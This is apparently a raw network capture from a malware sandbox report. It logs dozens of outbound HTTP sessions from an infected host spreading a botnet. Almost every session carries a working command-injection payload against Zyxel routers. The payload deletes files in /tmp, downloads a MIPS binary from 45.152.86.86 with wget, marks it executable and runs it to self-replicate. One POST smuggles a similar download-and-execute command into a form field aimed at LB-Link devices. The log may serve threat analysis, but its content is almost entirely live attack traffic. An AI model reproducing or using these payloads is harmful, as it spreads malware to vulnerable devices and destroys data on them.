                              Mar 31, 2024 08:41:14.698045969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2906192.168.2.135977020.60.152.338080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.612911940 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:15.778352976 CEST525INHTTP/1.1 400 Bad Request
                              Content-Type: text/html; charset=us-ascii
                              Server: Microsoft-HTTPAPI/2.0
                              Date: Sun, 31 Mar 2024 06:41:15 GMT
                              Connection: close
                              Content-Length: 334
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>
                              Mar 31, 2024 08:41:16.228051901 CEST525INHTTP/1.1 400 Bad Request
                              Content-Type: text/html; charset=us-ascii
                              Server: Microsoft-HTTPAPI/2.0
                              Date: Sun, 31 Mar 2024 06:41:15 GMT
                              Connection: close
                              Content-Length: 334
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>


                              Session IDSource IPSource PortDestination IPDestination Port
                              2907192.168.2.1359824140.103.227.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.677762032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2908192.168.2.1343994199.246.95.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.677876949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2909192.168.2.1344408136.20.254.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.677975893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2910192.168.2.1360138152.31.226.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678026915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2911192.168.2.1354164145.21.26.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678055048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2912192.168.2.134773091.247.12.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678101063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2913192.168.2.1344938144.68.146.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678133965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2914192.168.2.1351624162.192.69.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678204060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2915192.168.2.1339762188.233.237.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678230047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2916192.168.2.1355652145.63.252.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678299904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2917192.168.2.1340978138.85.88.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678329945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2918192.168.2.1353934167.53.215.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678375006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2919192.168.2.1348264147.228.206.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678405046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2920192.168.2.1334082102.162.96.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678447962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2921192.168.2.1335644205.199.179.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678505898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2922192.168.2.1354864110.0.44.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678558111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2923192.168.2.133359680.253.167.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678590059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2924192.168.2.1335926136.69.160.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678621054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2925192.168.2.1353138184.254.130.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678688049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2926192.168.2.1333516137.13.242.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678735018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2927192.168.2.1359838130.154.34.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678792953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2928192.168.2.135471284.151.239.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678831100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2929192.168.2.1351732101.88.102.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678848028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2930192.168.2.1355604177.78.221.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678889990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2931192.168.2.135958899.155.67.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678946972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2932192.168.2.1335928219.250.178.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.678986073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2933192.168.2.1351824194.217.246.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679029942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2934192.168.2.1334140155.246.220.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679080009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2935192.168.2.135236698.188.141.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679120064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2936192.168.2.135999631.147.94.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679177046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2937192.168.2.135448874.60.74.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679222107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2938192.168.2.1342826212.232.233.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679267883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2939192.168.2.13419981.10.219.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679303885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2940192.168.2.1346434177.231.185.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679342985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2941192.168.2.135684249.126.83.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679394960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2942192.168.2.1333754129.247.46.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679435015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2943192.168.2.1335692159.26.187.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679452896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2944192.168.2.135956259.145.181.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679507017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2945192.168.2.135257023.108.48.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679541111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2946192.168.2.1338128170.109.209.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679599047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2947192.168.2.1344210161.249.227.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679652929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2948192.168.2.133949471.145.161.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679685116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2949192.168.2.135572480.67.32.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679729939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2950192.168.2.1335642189.109.9.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679759026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2951192.168.2.135756659.108.55.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679827929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2952192.168.2.134646247.138.12.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679872036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2953192.168.2.1348802187.126.88.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679908991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2954192.168.2.135582639.8.98.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679955959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2955192.168.2.133647675.239.240.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679966927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2956192.168.2.133966293.6.107.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.679992914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2957192.168.2.1339830131.35.16.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680054903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2958192.168.2.1343000113.31.0.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680105925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2959192.168.2.134543849.11.39.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680144072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2960192.168.2.1355336174.93.89.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680186987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2961192.168.2.135833459.98.251.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680213928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2962192.168.2.1335786153.65.69.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.680246115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
